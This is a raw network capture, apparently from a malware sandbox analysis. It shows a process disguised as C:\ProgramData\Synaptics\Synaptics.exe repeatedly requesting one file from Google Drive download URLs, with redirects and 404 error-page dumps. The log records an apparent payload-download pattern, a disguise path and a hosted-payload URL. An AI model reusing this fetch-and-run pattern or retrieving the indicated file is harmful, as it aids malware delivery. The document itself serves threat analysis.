                                                                                                                2024-12-30 09:58:19 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                34192.168.2.749802142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:19 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:19 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5N7Baauisth124WrNKUVfTFxwn2nSKb6mzl_piLSobAHqe5vTy0WUT_FOzCk3iBpr5
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:19 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-HcGWl0t4NIr10LZFH2yJ-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:19 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:19 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 4c 4d 54 78 53 4f 63 4a 4e 44 58 5f 59 69 69 5f 4c 35 6c 6d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="JLMTxSOcJNDX_Yii_L5lmw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:19 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                35192.168.2.749809216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:20 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                36192.168.2.749808216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:20 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                37192.168.2.749811142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:20 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                38192.168.2.749814142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:20 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                39192.168.2.749821216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:21 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:21 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-7XyloHLZgvywUspxq-9Y5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                40192.168.2.749820216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:21 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:21 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-miV8Av01WmPiCtx6T8uk5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                41192.168.2.759820142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:22 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:22 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7zuWiKJQTHXnttQDVbw_v_-VHjrZHZbUobR-BvkG9YNsHvi0SHjoe8RaitX84Ero2P
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:22 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-GybVQ_S-ZNCktUf_OZ61mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:22 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:22 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 69 41 50 2d 35 4f 5a 32 50 4c 59 52 37 41 58 69 2d 4e 63 73 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="PiAP-5OZ2PLYR7AXi-Ncsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:22 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                42192.168.2.759819216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:22 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:22 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-DYM3VxkzIegGADNHt65zbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                43192.168.2.759818142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:22 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:22 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7ygkEC0aDN4Nk81-Wf6EOAEAw3qrWlkwtwdP_iBVCuoLvebXpIEFSEhW3VCANaMT2TRkQiE1w
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:22 GMT
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-lJzX9Aocll-xsiSZ8BK1_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:22 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:22 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 51 35 43 6b 42 41 38 66 42 38 78 78 6b 48 74 67 76 66 56 44 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="aQ5CkBA8fB8xxkHtgvfVDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:22 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                44192.168.2.759821216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:22 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
